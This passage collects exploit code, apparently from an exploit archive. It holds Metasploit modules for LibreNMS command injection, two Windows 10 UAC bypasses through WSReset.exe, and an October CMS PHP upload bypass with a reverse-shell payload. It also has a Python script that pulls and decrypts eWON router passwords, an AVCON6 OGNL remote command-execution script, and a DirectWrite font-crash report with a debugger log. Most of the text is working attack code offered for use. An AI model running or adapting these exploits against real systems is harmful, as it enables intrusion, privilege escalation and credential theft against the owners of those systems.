true, 'Base LibreNMS path', '/' ]), OptString.new('USERNAME', [ true, 'User name for LibreNMS', '' ]), OptString.new('PASSWORD', [ true, 'Password for LibreNMS', '' ]) ]) end def check res = send_request_cgi!('method' => 'GET', 'uri' => target_uri.path) return Exploit::CheckCode::Safe unless res && res.body.downcase.include?('librenms') about_res = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'pages', 'about.inc.php') ) return Exploit::CheckCode::Detected unless about_res && about_res.code == 200 version = about_res.body.match(/version\s+to\s+(\d+\.\d+\.?\d*)/) return Exploit::CheckCode::Detected unless version && version.length > 1 vprint_status("LibreNMS version #{version[1]} detected") version = Gem::Version.new(version[1]) return Exploit::CheckCode::Appears if version <= Gem::Version.new('1.50') end def login login_uri = normalize_uri(target_uri.path, 'login') res = send_request_cgi('method' => 'GET', 'uri' => login_uri) fail_with(Failure::NotFound, 'Failed to access the login page') unless res && res.code == 200 cookies = res.get_cookies login_res = send_request_cgi( 'method' => 'POST', 'uri' => login_uri, 'cookie' => cookies, 'vars_post' => { 'username' => datastore['USERNAME'], 'password' => datastore['PASSWORD'] } ) fail_with(Failure::NoAccess, 'Failed to submit credentials to login page') unless login_res && login_res.code == 302 cookies = login_res.get_cookies res = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(target_uri.path), 'cookie' => cookies ) fail_with(Failure::NoAccess, 'Failed to log into LibreNMS') unless res && res.code == 200 && res.body.include?('Devices') print_status('Successfully logged into LibreNMS. Storing credentials...') store_valid_credential(user: datastore['USERNAME'], private: datastore['PASSWORD']) login_res.get_cookies end def get_version uri = normalize_uri(target_uri.path, 'about') res = send_request_cgi( 'method' => 'GET', 'uri' => uri, 'cookie' => @cookies ) fail_with(Failure::NotFound, 'Failed to reach the about LibreNMS page') unless res && res.code == 200 html = res.get_html_document version = html.search('tr//td//a') fail_with(Failure::NotFound, 'Failed to retrieve version information') if version.empty? version.each do |e| return $1 if e.text =~ /(\d+\.\d+\.?\d*)/ end end def get_device_ids version = get_version print_status("LibreNMS version: #{version}") if version && Gem::Version.new(version) < Gem::Version.new('1.50') dev_uri = normalize_uri(target_uri.path, 'ajax_table.php') format = '+list_detail' else dev_uri = normalize_uri(target_uri.path, 'ajax', 'table', 'device') format = 'list_detail' end dev_res = send_request_cgi( 'method' => 'POST', 'uri' => dev_uri, 'cookie' => @cookies, 'vars_post' => { 'id' => 'devices', 'format' => format, 'current' => '1', 'sort[hostname]' => 'asc', 'rowCount' => 50 } ) fail_with(Failure::NotFound, 'Failed to access the devices page') unless dev_res && dev_res.code == 200 json = JSON.parse(dev_res.body) fail_with(Failure::NotFound, 'Unable to retrieve JSON response') if json.empty? json = json['rows'] fail_with(Failure::NotFound, 'Unable to find hostname data') if json.empty? hosts = [] json.each do |row| hostname = row['hostname'] next if hostname.nil? id = hostname.match('href=\"device\/device=(\d+)\/') next unless id && id.length > 1 hosts << id[1] end fail_with(Failure::NotFound, 'Failed to retrieve any device ids') if hosts.empty? hosts end def get_plugin_info(id) uri = normalize_uri(target_uri.path, "device", "device=#{id}", "tab=collectd") res = send_request_cgi( 'method' => 'GET', 'uri' => uri, 'cookie' => @cookies ) return unless res && res.code == 200 html = res.get_html_document plugin_link = html.at('div[@class="col-md-3"]//a/@href') return if plugin_link.nil? plugin_link = plugin_link.value plugin_hash = Hash[plugin_link.split('/').map { |plugin_val| plugin_val.split('=') }] c_plugin = plugin_hash['c_plugin'] c_type = plugin_hash['c_type'] c_type_instance = plugin_hash['c_type_instance'] || '' c_plugin_instance = plugin_hash['c_plugin_instance'] || '' return c_plugin, c_type, c_plugin_instance, c_type_instance end def exploit req_uri = normalize_uri(target_uri.path, 'graph.php') @cookies = login dev_ids = get_device_ids collectd_device = -1 plugin_name = nil plugin_type = nil plugin_instance = nil plugin_type_inst = nil dev_ids.each do |device| collectd_device = device plugin_name, plugin_type, plugin_instance, plugin_type_inst = get_plugin_info(device) break if (plugin_name && plugin_type && plugin_instance && plugin_type_inst) collectd_device = -1 end fail_with(Failure::NotFound, 'Failed to find a collectd plugin for any of the devices') if collectd_device == -1 print_status("Sending payload via device #{collectd_device}") res = send_request_cgi( 'method' => 'GET', 'uri' => req_uri, 'cookie' => @cookies, 'vars_get' => { 'device' => collectd_device, 'type' => 'device_collectd', 'to' => Rex::Text.rand_text_numeric(10), 'from' => "1`#{payload.encoded}`", 'c_plugin' => plugin_name, 'c_type' => plugin_type, 'c_plugin_instance' => plugin_instance, 'c_type_instance' => plugin_type_inst } ) end end

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Local Rank = ManualRanking include Msf::Exploit::EXE include Msf::Exploit::FileDropper include Post::Windows::Priv include Post::Windows::Runas def initialize(info = {}) super( update_info( info, 'Name' => 'Windows 10 UAC Protection Bypass Via Windows Store (WSReset.exe)', 'Description' => %q{ This module exploits a flaw in the WSReset.exe Windows Store Reset Tool. The tool is run with the "autoElevate" property set to true, however it can be moved to a new Windows directory containing a space (C:\Windows \System32\) where, upon execution, it will load our payload dll (propsys.dll). }, 'License' => MSF_LICENSE, 'Author' => [ 'ACTIVELabs', # discovery 'sailay1996', # poc 'timwr', # metasploit module ], 'Platform' => ['win'], 'SessionTypes' => ['meterpreter'], 'Targets' => [[ 'Automatic', {} ]], 'DefaultTarget' => 0, 'DefaultOptions' => { 'EXITFUNC' => 'process', 'WfsDelay' => 15 }, 'DisclosureDate' => 'Aug 22 2019', 'Notes' => { 'SideEffects' => [ ARTIFACTS_ON_DISK, SCREEN_EFFECTS ], }, 'References' => [ ['URL', 'https://heynowyouseeme.blogspot.com/2019/08/windows-10-lpe-uac-bypass-in-windows.html'], ['URL', 'https://github.com/sailay1996/UAC_bypass_windows_store'], ['URL', 'https://medium.com/tenable-techblog/uac-bypass-by-mocking-trusted-directories-24a96675f6e'], ], ) ) end def check if sysinfo['OS'] =~ /Windows 10/ && is_uac_enabled? && exists?("C:\\Windows\\System32\\WSReset.exe") return CheckCode::Appears end CheckCode::Safe end def exploit if sysinfo['Architecture'] == ARCH_X64 && session.arch == ARCH_X86 fail_with(Failure::NoTarget, 'Running against WOW64 is not supported') end # Make sure we have a sane payload configuration if sysinfo['Architecture'] != payload.arch.first fail_with(Failure::BadConfig, 'The payload should use the same architecture as the target') end check_permissions! case get_uac_level when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP, UAC_PROMPT_CONSENT_IF_SECURE_DESKTOP, UAC_PROMPT_CREDS, UAC_PROMPT_CONSENT fail_with(Failure::NotVulnerable, "UAC is set to 'Always Notify'. This module does not bypass this setting, exiting...") when UAC_DEFAULT print_good('UAC is set to Default') print_good('BypassUAC can bypass this setting, continuing...') when UAC_NO_PROMPT print_warning('UAC set to DoNotPrompt - using ShellExecute "runas" method instead') shell_execute_exe return end exploit_win_dir = "C:\\Windows \\" exploit_dir = "C:\\Windows \\System32\\" exploit_file = exploit_dir + "WSReset.exe" unless exists? exploit_win_dir print_status("Creating directory '#{exploit_win_dir}'...") session.fs.dir.mkdir(exploit_win_dir) end unless exists? exploit_dir print_status("Creating directory '#{exploit_dir}'...") session.fs.dir.mkdir(exploit_dir) end unless exists? exploit_file session.fs.file.copy("C:\\Windows\\System32\\WSReset.exe", exploit_file) end payload_dll = "C:\\Windows \\System32\\propsys.dll" print_status("Creating payload '#{payload_dll}'...") payload = generate_payload_dll write_file(payload_dll, payload) print_status("Executing WSReset.exe...") begin session.sys.process.execute("cmd.exe /c \"#{exploit_file}\"", nil, {'Hidden' => true}) rescue ::Exception => e print_error(e.to_s) end print_warning("This exploit requires manual cleanup of the '#{exploit_win_dir}' and '#{exploit_dir}' directories!") end def check_permissions! unless check == Exploit::CheckCode::Appears fail_with(Failure::NotVulnerable, "Target is not vulnerable.") end fail_with(Failure::None, 'Already in elevated state') if is_admin? || is_system? # Check if you are an admin # is_in_admin_group can be nil, true, or false print_status('UAC is Enabled, checking level...') vprint_status('Checking admin status...') admin_group = is_in_admin_group? if admin_group.nil? print_error('Either whoami is not there or failed to execute') print_error('Continuing under assumption you already checked...') else if admin_group print_good('Part of Administrators group! Continuing...') else fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module') end end if get_integrity_level == INTEGRITY_LEVEL_SID[:low] fail_with(Failure::NoAccess, 'Cannot BypassUAC from Low Integrity Level') end end end

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' => 'October CMS Upload Protection Bypass Code Execution', 'Description' => %q{ This module exploits an Authenticated user with permission to upload and manage media contents can upload various files on the server. Application prevents the user from uploading PHP code by checking the file extension. It uses black-list based approach, as seen in octobercms/vendor/october/rain/src/Filesystem/ Definitions.php:blockedExtensions(). This module was tested on October CMS version v1.0.412 on Ubuntu. }, 'Author' => [ 'Anti Räis', # Discovery 'Touhid M.Shaikh <touhidshaikh22[at]gmail.com>', # Metasploit Module 'SecureLayer7.net' # Metasploit Module ], 'License' => MSF_LICENSE, 'References' => [ ['EDB','41936'], ['URL','https://bitflipper.eu/finding/2017/04/october-cms-v10412-several-issues.html'], ['CVE','2017-1000119'] ], 'DefaultOptions' => { 'SSL' => false, 'PAYLOAD' => 'php/meterpreter/reverse_tcp', 'ENCODER' => 'php/base64', }, 'Privileged' => false, 'Platform' => ['php'], 'Arch' => ARCH_PHP, 'Targets' => [ [ 'October CMS v1.0.412', { } ], ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Apr 25 2017')) register_options( [ OptString.new('TARGETURI', [ true, "Base October CMS directory path", '/']), OptString.new('USERNAME', [ true, "Username to authenticate with", 'admin']), OptString.new('PASSWORD', [ true, "Password to authenticate with", 'admin']) ]) end def uri return target_uri.path end def check begin res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(uri, 'modules', 'system', 'assets', 'js', 'framework.js') }) rescue vprint_error('Unable to access the /assets/js/framework.js file') return CheckCode::Unknown end if res && res.code == 200 return Exploit::CheckCode::Appears end return CheckCode::Safe end def login res = send_request_cgi({ 'uri' => normalize_uri(uri, 'backend', 'backend', 'auth', 'signin'), 'method' => 'GET' }) if res.nil? fail_with(Failure::Unreachable, "#{peer} - Connection failed") end /name="_session_key" type="hidden" value="(?<session>[A-Za-z0-9"]+)">/ =~ res.body fail_with(Failure::UnexpectedReply, "#{peer} - Could not determine Session Key") if session.nil? /name="_token" type="hidden" value="(?<token>[A-Za-z0-9"]+)">/ =~ res.body fail_with(Failure::UnexpectedReply, "#{peer} - Could not determine token") if token.nil? vprint_good("Token for login : #{token}") vprint_good("Session Key for login : #{session}") cookies = res.get_cookies vprint_status('Trying to Login ......') res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(uri, 'backend', 'backend', 'auth', 'signin'), 'cookie' => cookies, 'vars_post' => Hash[{ '_session_key' => session, '_token' => token, 'postback' => '1', 'login' => datastore['USERNAME'], 'password' => datastore['PASSWORD'] }.to_a.shuffle] }) fail_with(Failure::UnexpectedReply, "#{peer} - Did not respond to Login request") if res.nil? # if we redirect. then we assume we have authenticated cookie. if res.code == 302 print_good("Authentication successful: #{datastore['USERNAME']}:#{datastore['PASSWORD']}") store_valid_credential(user: datastore['USERNAME'], private: datastore['PASSWORD']) return cookies else fail_with(Failure::UnexpectedReply, "#{peer} - Authentication Failed :[ #{datastore['USERNAME']}:#{datastore['PASSWORD']} ]") end end def exploit cookies = login evil = "<?php #{payload.encoded} ?>" payload_name = "#{rand_text_alpha(8..13)}.php5" post_data = Rex::MIME::Message.new post_data.add_part("/", content_type = nil, transfer_encoding = nil, content_disposition = 'form-data; name="path"') post_data.add_part(evil, content_type = 'application/x-php', transfer_encoding = nil, content_disposition = "form-data; name=\"file_data\"; filename=\"#{payload_name}") #payload data = post_data.to_s register_files_for_cleanup(payload_name) vprint_status("Trying to upload malicious #{payload_name} file ....") res = send_request_cgi({ 'uri' => normalize_uri(uri, 'backend', 'cms', 'media'), 'method' => 'POST', 'cookie' => cookies, 'headers' => { 'X-OCTOBER-FILEUPLOAD' => 'MediaManager-manager' }, 'Connection' => 'close', 'data' => data, 'ctype' => "multipart/form-data; boundary=#{post_data.bound}" }) send_request_cgi({ 'uri' => normalize_uri(uri, 'storage', 'app', 'media', payload_name), 'method' => 'GET' }) end end

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Local Rank = ManualRanking include Msf::Exploit::EXE include Msf::Exploit::FileDropper include Post::Windows::Priv include Post::Windows::Runas def initialize(info = {}) super( update_info(info, 'Name' => 'Windows 10 UAC Protection Bypass Via Windows Store (WSReset.exe) and Registry', 'Description' => %q( This module exploits a flaw in the WSReset.exe file associated with the Windows Store. This binary has autoelevate privs, and it will run a binary file contained in a low-privilege registry location. By placing a link to the binary in the registry location, WSReset.exe will launch the binary as a privileged user. ), 'License' => MSF_LICENSE, 'Author' => [ 'ACTIVELabs', # discovery 'sailay1996', # poc 'bwatters-r7', # metasploit module ], 'Platform' => ['win'], 'SessionTypes' => ['meterpreter'], 'Targets' => [[ 'Automatic', {} ]], 'DefaultTarget' => 0, 'DefaultOptions' => { 'WfsDelay' => 15 }, 'DisclosureDate' => 'Feb 19 2019', 'Notes' => { 'SideEffects' => [ ARTIFACTS_ON_DISK, SCREEN_EFFECTS ] }, 'References' => [ ['URL', 'https://www.activecyber.us/activelabs/windows-uac-bypass'], ['URL', 'https://heynowyouseeme.blogspot.com/2019/08/windows-10-lpe-uac-bypass-in-windows.html'], ['URL', 'https://github.com/sailay1996/UAC_bypass_windows_store'], ] ) ) register_options( [OptString.new('PAYLOAD_NAME', [false, 'The filename to use for the payload binary (%RAND% by default).', nil])] ) end def check if sysinfo['OS'] =~ /Windows 10/ && is_uac_enabled? && exists?("C:\\Windows\\System32\\WSReset.exe") return CheckCode::Appears end CheckCode::Safe end def exploit check_permissions! case get_uac_level when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP, UAC_PROMPT_CONSENT_IF_SECURE_DESKTOP, UAC_PROMPT_CREDS, UAC_PROMPT_CONSENT fail_with(Failure::NotVulnerable, "UAC is set to 'Always Notify'. This module does not bypass this setting, exiting...") when UAC_DEFAULT print_good('UAC is set to Default') print_good('BypassUAC can bypass this setting, continuing...') when UAC_NO_PROMPT print_warning('UAC set to DoNotPrompt - using ShellExecute "runas" method instead') shell_execute_exe return end # get directory locations straight win_dir = session.sys.config.getenv('windir') vprint_status("win_dir = " + win_dir) tmp_dir = session.sys.config.getenv('tmp') vprint_status("tmp_dir = " + tmp_dir) exploit_dir = win_dir + "\\System32\\" vprint_status("exploit_dir = " + exploit_dir) reset_filepath = exploit_dir + "WSReset.exe" vprint_status("exploit_file = " + reset_filepath) # make payload payload_name = datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha((rand(8) + 6)) + '.exe' payload_pathname = tmp_dir + '\\' + payload_name vprint_status("payload_pathname = " + payload_pathname) vprint_status("Making Payload") payload = generate_payload_exe reg_command = exploit_dir + "cmd.exe /c start #{payload_pathname}" vprint_status("reg_command = " + reg_command) registry_key = "HKCU\\Software\\Classes\\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\\Shell\\open\\command" # make registry changes vprint_status("Making Registry Changes") begin registry_createkey(registry_key) registry_setvaldata(registry_key, "DelegateExecute", '', "REG_SZ") registry_setvaldata(registry_key, '', reg_command, "REG_SZ") rescue ::Exception => e print_error(e.to_s) end vprint_status("Registry Changes Complete") # Upload payload vprint_status("Uploading Payload to #{payload_pathname}") write_file(payload_pathname, payload) vprint_status("Payload Upload Complete") vprint_status("Launching " + reset_filepath) begin session.sys.process.execute("cmd.exe /c \"#{reset_filepath}\"", nil, 'Hidden' => true) rescue ::Exception => e print_error(e.to_s) end print_warning("This exploit requires manual cleanup of '#{payload_pathname}!") # wait for a few seconds before cleaning up sleep(20) vprint_status("Removing Registry Changes") registry_deletekey(registry_key) vprint_status("Registry Changes Removed") end def check_permissions! unless check == Exploit::CheckCode::Appears fail_with(Failure::NotVulnerable, "Target is not vulnerable.") end fail_with(Failure::None, 'Already in elevated state') if is_admin? || is_system? # Check if you are an admin # is_in_admin_group can be nil, true, or false print_status('UAC is Enabled, checking level...') vprint_status('Checking admin status...') admin_group = is_in_admin_group? if admin_group.nil? print_error('Either whoami is not there or failed to execute') print_error('Continuing under assumption you already checked...') else if admin_group print_good('Part of Administrators group! Continuing...') else fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module') end end if get_integrity_level == INTEGRITY_LEVEL_SID[:low] fail_with(Failure::NoAccess, 'Cannot BypassUAC from Low Integrity Level') end end end

#!/usr/bin/env python ''' # Exploit Title: eWON v13.0 Authentication Bypass # Date: 2018-10-12 # Exploit Author: Photubias – tijl[dot]Deneut[at]Howest[dot]be for www.ic4.be # Vendor Advisory: [1] https://websupport.ewon.biz/support/news/support/ewon-security-enhancement-131s0-0 # [2] https://websupport.ewon.biz/support/news/support/ewon-security-vulnerability # Vendor Homepage: https://www.ewon.biz # Version: eWon Firmware 12.2 to 13.0 # Tested on: eWon Flexy with Firmware 13.0s0 Copyright 2019 Photubias(c) This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see <http://www.gnu.org/licenses/>. File name eWON-Flewy-Pwn.py written by tijl[dot]deneut[at]howest[dot]be for www.ic4.be This script will perform retrieval of clear text credentials for an eWON Flexy router Tested on the eWON Flexy 201 with Firmware 13.0s0 Only requires a valid username (default = adm) and this user must have the Rights 'View IO' & 'Change Configuration' It combines two vulnerabilities: authentication bypass (fixed in 13.1s0) and a weak password encryption, allowing cleartext password retrievel for all users (fixed in 13.3s0) ''' username = 'adm' import urllib2,urllib,base64,binascii,os def decode(encpass): xorString = "6414FE6F4C964746900208FC9B3904963A2F61" def convertPass(password): if (len(password)/2) > 19: print('Error, password can not exceed 19 characters') exit() return hexxor(password, xorString[:len(password)]) def hexxor(a, b): return "".join(["%x" % (int(x,16) ^ int(y,16)) for (x, y) in zip(a, b)]) if encpass.startswith('#_'): encpass = encpass.split('_')[2] coded = base64.b64decode(encpass) codedhex = binascii.hexlify(coded)[:-4] clearpass = binascii.unhexlify(convertPass(codedhex)) print('Decoded password: ' + clearpass) def getUserData(userid, strIP): postwsdlist = '["inf_HasJVM","usr_FirstName|1","usr_LastName|1","usr_Login|1","usr_Password|1","usr_Information|1","usr_Right|1","usr_AccessPage|1","usr_AccessDir|1","usr_CBEn|1","usr_CBMode|1","usr_CBPhNum|1","ols_AllAndAssignedPageList","ols_DirList","ols_CBMode"]' postwsdlist = postwsdlist.replace('|1','|'+str(userid)) postdata = {'wsdList' : postwsdlist} b64auth = base64.b64encode(username+':').replace('=','') result = urllib2.urlopen(urllib2.Request('http://'+strIP+'/wrcgi.bin/wsdReadForm',data=urllib.urlencode(postdata) ,headers={'Authorization' : ' Basic '+b64auth})).read() resultarr = result.split('","') if len(resultarr) == 20: fname = str(resultarr[1]) lname = str(resultarr[2]) usern = str(resultarr[3]) if len(usern) == 0: return True encpassword = resultarr[4] print('Decoding pass for user: '+usern+' ('+fname+' '+lname+') ') decode(encpassword) print('---') return True else: return True strIP = raw_input('Please enter an IP [10.0.0.53]: ') if strIP == '': strIP = '10.0.0.53' print('---') for i in range(20): if not getUserData(i, strIP): print('### That\'s all folks ;-) ###') raw_input() exit(0) raw_input('All Done')

# Exploit Title: AVCON6 systems management platform - OGNL - Remote root command execution # Date: 10/09/2018 # Exploit Author: Nassim Asrir # Contact: [email protected] | https://www.linkedin.com/in/nassim-asrir-b73a57122/ # CVE: N\A # Tested On: Windows 10(64bit) / 61.0b12 (64-bit) # Thanks to: Otmane Aarab # Example below: # python ./rce.py http://server:8080/ id # Testing Target: http://server:8080/ # uid=0(root) gid=0(root) # Vendor: http://www.epross.com/ # About the product: The AVCON6 video conferencing system is the most complete set of systems, including multi-screen multi-split screens and systems that are integrated with H323/SIP protocol devices. High-end video conferencing # software ideal for Room Base environments and performance requirements. Multi-party video conferencing can connect thousands of people at the same time. # I am not responsible for any wrong use. ###################################################################################################### #!/usr/bin/python # -*- coding: utf-8 -*- import urllib2 import httplib def exploit(url, cmd): payload = 'login.action?redirect:' payload += '${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{%22'+cmd+'%22})).' payload += 'start(),%23b%3d%23a.getInputStream(),' payload += '%23c%3dnew%20java.io.InputStreamReader(%23b),' payload += '%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d' payload += '.read(%23e),%23matt%3d%23context.' payload += 'get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),' payload += '%23matt.getWriter().println(%23e),%23matt.' payload += 'getWriter().flush(),%23matt.getWriter()' payload += '.close()}' try: headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0'} request = urllib2.Request(url+payload, headers=headers) page = urllib2.urlopen(request).read() except httplib.IncompleteRead, e: page = e.partial print(page) return page if __name__ == '__main__': import sys if len(sys.argv) != 3: print("[*] struts2_S2-045.py http://target/ id") else: print('[*] Avcon6-Preauh-Remote Command Execution') url = sys.argv[1] cmd = sys.argv[2] print("[*] Executed Command: %s\n" % cmd) print("[*] Target: %s\n" % url) exploit(url, cmd)

Microsoft DirectWrite is a modern Windows API for high-quality text rendering. A majority of its code resides in the DWrite.dll user-mode library. It is used by a variety of widely used desktop programs (such as the Chrome, Firefox and Edge browsers) and constitutes an attack surface for memory corruption bugs, as it performs the processing of untrusted font files and is written in C/C++. Through fuzzing, we have discovered a crash caused by an invalid memory read in DWrite!SplicePixel, while rasterizing the glyphs of a slightly malformed OpenType font. The problem reproduces in all major browsers; below is a crash log from the Microsoft Edge renderer process, generated when trying to open a web page with the proof-of-concept font embedded: --- cut --- (281c.25d4): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. DWrite!SplicePixel+0x14b: 00007fff`b8634473 488b14f0 mov rdx,qword ptr [rax+rsi*8] ds:00000227`c62d95b0=???????????????? 0:031> u DWrite!SplicePixel+0x14b: 00007fff`b8634473 488b14f0 mov rdx,qword ptr [rax+rsi*8] 00007fff`b8634477 4885d2 test rdx,rdx 00007fff`b863447a 7474 je DWrite!SplicePixel+0x1c8 (00007fff`b86344f0) 00007fff`b863447c 458d4b01 lea r9d,[r11+1] 00007fff`b8634480 8b4208 mov eax,dword ptr [rdx+8] 00007fff`b8634483 413bc1 cmp eax,r9d 00007fff`b8634486 7f68 jg DWrite!SplicePixel+0x1c8 (00007fff`b86344f0) 00007fff`b8634488 488b0a mov rcx,qword ptr [rdx] 0:031> ? rax Evaluate expression: 2369851854688 = 00000227`c62d8f60 0:031> ? rsi Evaluate expression: 202 = 00000000`000000ca 0:031> dd rax 00000227`c62d8f60 ???????? ???????? ???????? ???????? 00000227`c62d8f70 ???????? ???????? ???????? ???????? 00000227`c62d8f80 ???????? ???????? ???????? ???????? 00000227`c62d8f90 ???????? ???????? ???????? ???????? 00000227`c62d8fa0 ???????? ???????? ???????? ???????? 00000227`c62d8fb0 ???????? ???????? ???????? ???????? 00000227`c62d8fc0 ???????? ???????? ???????? ???????? 00000227`c62d8fd0 ???????? ???????? ???????? ???????? 0:031> k # Child-SP RetAddr Call Site 00 000000b4`ceaebe00 00007fff`b8634306 DWrite!SplicePixel+0x14b 01 000000b4`ceaebe50 00007fff`b8633325 DWrite!SetPixelInDropOut+0x9a 02 000000b4`ceaebe90 00007fff`b86322a8 DWrite!FillInInflection+0xcd 03 000000b4`ceaebf00 00007fff`b863281b DWrite!DoXInflections+0x118 04 000000b4`ceaebf40 00007fff`b86319ca DWrite!EditBlackSpace+0x29f 05 000000b4`ceaebfa0 00007fff`b8636118 DWrite!CScan+0x72 06 000000b4`ceaebff0 00007fff`b855b1b2 DWrite!CScanFill+0x204 07 000000b4`ceaec0e0 00007fff`b848ccef DWrite!DoType1InterpretCharString+0xcd77a 08 000000b4`ceaec790 00007fff`b862ea16 DWrite!Type1InterpretCharString+0x163 09 000000b4`ceaec880 00007fff`b862dd49 DWrite!BuildRuns+0x186 0a 000000b4`ceaec9b0 00007fff`b862b2b9 DWrite!ATMBuildBitMap+0xb9 0b 000000b4`ceaeca80 00007fff`b85b88b7 DWrite!AdobeInternalGetBitmap+0x31d 0c 000000b4`ceaecd20 00007fff`b85b877a DWrite!CffRasterizer::Implementation::GetBitmap+0x11f 0d 000000b4`ceaece60 00007fff`b84e2c89 DWrite!CffRasterizer::GetBitmap+0x2a 0e 000000b4`ceaecea0 00007fff`b84b1754 DWrite!GlyphBitmapRasterizationState::RasterizeGlyph+0x111 0f 000000b4`ceaecee0 00007fff`c8e3e1ce DWrite!DWriteGlyphLookupCache::GetGlyphBitmapInfo+0x264 10 000000b4`ceaed150 00007fff`c8e3e95f d2d1!GlyphRunAnalyzer::AddCachedGlyph+0x62 11 000000b4`ceaed200 00007fff`c8e460b0 d2d1!GlyphRunAnalyzer::GetGlyphs+0x18f 12 000000b4`ceaed250 00007fff`c8e5572d d2d1!GlyphRunRenderer::InitForRendering+0x2c0 13 000000b4`ceaed390 00007fff`c8ebffe4 d2d1!CHwSurfaceRenderTarget::DrawGlyphRun+0x38d 14 000000b4`ceaed6a0 00007fff`c8e5379e d2d1!BrushRedirectionCompatibleCommand<CCommand_DrawGlyphRun,0>::Execute+0x134 15 000000b4`ceaed7b0 00007fff`c8e6e7ef d2d1!CHwSurfaceRenderTarget::ProcessBatch+0x3ce 16 000000b4`ceaed860 00007fff`c8e6a0ae d2d1!CBatchSerializer::FlushInternal+0x13f 17 000000b4`ceaed8f0 00007fff`c8e6143b d2d1!DrawingContext::Flush+0x96 18 000000b4`ceaed950 00007fff`9dba551e d2d1!D2DDeviceContextBase<ID2D1DeviceContext6,ID2D1DeviceContext6,null_type>::EndDraw+0x13b 19 000000b4`ceaeda90 00007fff`9da3a704 edgehtml!CDXRenderTarget::EndDrawD2D+0x66 1a 000000b4`ceaedac0 00007fff`9da3a4e8 edgehtml!CDXRenderTarget::EnsureRenderMode+0x184 1b 000000b4`ceaedaf0 00007fff`9db9db85 edgehtml!CDXRenderTarget::EndDraw+0x38 1c 000000b4`ceaedb40 00007fff`9db9da0b edgehtml!CDispSurface::EndLayerToRenderTarget+0x145 1d 000000b4`ceaedbe0 00007fff`9da2585f edgehtml!CDispNodeDestination::EndRender+0x6b 1e 000000b4`ceaedc50 00007fff`9db660c1 edgehtml!CDispNodeDestination::EndRect+0xaf 1f 000000b4`ceaedc90 00007fff`9da1cf83 edgehtml!CDispDestinationDrawHelper::EndRect+0x31 20 000000b4`ceaedcc0 00007fff`9d9de055 edgehtml!CDispContainer::DrawSelfContent+0x583 21 000000b4`ceaede30 00007fff`9d9df37e edgehtml!CDispContainer::DrawSelf+0x365 22 000000b4`ceaedfc0 00007fff`9da1ee43 edgehtml!CDispNode::DrawInternal+0x7ce 23 000000b4`ceaee350 00007fff`9da1d747 edgehtml!CDispNode::Draw+0x943 24 000000b4`ceaee560 00007fff`9da1d297 edgehtml!CDispContainer::DrawChildren+0x227 25 000000b4`ceaee620 00007fff`9da1cbc8 edgehtml!CDispContainer::DrawSelfContentFullStackingContext+0x127 26 000000b4`ceaee710 00007fff`9d9de055 edgehtml!CDispContainer::DrawSelfContent+0x1c8 27 000000b4`ceaee880 00007fff`9d9df37e edgehtml!CDispContainer::DrawSelf+0x365 28 000000b4`ceaeea10 00007fff`9da1ead3 edgehtml!CDispNode::DrawInternal+0x7ce 29 000000b4`ceaeeda0 00007fff`9da2a8fc edgehtml!CDispNode::Draw+0x5d3 2a 000000b4`ceaeefb0 00007fff`9da29b68 edgehtml!CDispRoot::DrawIndependentCompositionLayerTree+0x5c 2b 000000b4`ceaef0a0 00007fff`9da297f5 edgehtml!CDispRoot::DrawRoot+0x1b8 2c 000000b4`ceaef2f0 00007fff`9daa452c edgehtml!CPaintHandler::RenderInternal+0x2b5 2d 000000b4`ceaef870 00007fff`9d9c4ac8 edgehtml!CPaintHandler::RenderIfNeeded+0x7c 2e 000000b4`ceaef8e0 00007fff`9dbaa80d edgehtml!CRenderThread::ProcessRenderWork+0xdc 2f 000000b4`ceaef940 00007fff`9dacfdb9 edgehtml!CRenderTaskDrawInPlace::Execute+0xad 30 000000b4`ceaef9b0 00007fff`9dbe7542 edgehtml!CRenderThread::RenderThread+0x229 31 000000b4`ceaefa50 00007fff`cec537e4 edgehtml!CRenderThread::StaticRenderThreadProc+0x42 32 000000b4`ceaefa80 00007fff`cf5bcb81 KERNEL32!BaseThreadInitThunk+0x14 33 000000b4`ceaefab0 00000000`00000000 ntdll!RtlUserThreadStart+0x21 --- cut --- We have minimized the test case to a single-byte difference in relation to the original file. When decompiled with the "ttx" utility from the fontTools package, the difference becomes obvious: it's a change of one of the FontMatrix values inside the CFF table. Original data: <FontMatrix value="0.001 0.0 0.000123 0.001 0.0 0.0"/> Mutated data: <FontMatrix value="0.001 2000000.0 0.000123 0.001 0.0 0.0"/> The issue reproduces on a fully updated Windows 7 and Windows 10 1709; we haven't tested other versions of the system. It could be potentially used to disclose sensitive data from the process address space. It is easiest to reproduce with PageHeap enabled, but it is also possible to observe a crash in a default system configuration. Attached are the minimized PoC font, original font, an HTML file to reproduce the bug in a browser, 